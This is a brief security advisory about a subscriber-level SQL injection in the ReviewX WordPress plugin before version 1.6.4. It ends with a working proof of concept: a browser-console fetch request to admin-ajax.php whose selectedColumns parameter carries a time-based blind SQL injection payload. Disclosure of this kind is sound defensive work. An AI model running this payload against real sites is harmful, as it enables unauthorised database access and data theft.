ReviewX < 1.6.4 - Subscriber+ SQLi

The plugin does not properly sanitise and escape the filterValue and selectedColumns parameters before using them in SQL statements via the rx_export_review AJAX action available to any authenticated users, leading to a SQL injection exploitable by users with a role as low as subscriber

PoC

Run the below command in the developer console of the web browser while being on the blog as subscriber user fetch(“/wp-admin/admin-ajax.php”, { “headers”: { “content-type”: “application/x-www-form-urlencoded”, }, “method”: “POST”, “body”: ‘action=rx_export_review&filterValue;[6]=&filterValue;[7]=id&selectedColumns;[]=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))a)’, “credentials”: “include” }).then(response => response.text()) .then(data => console.log(data));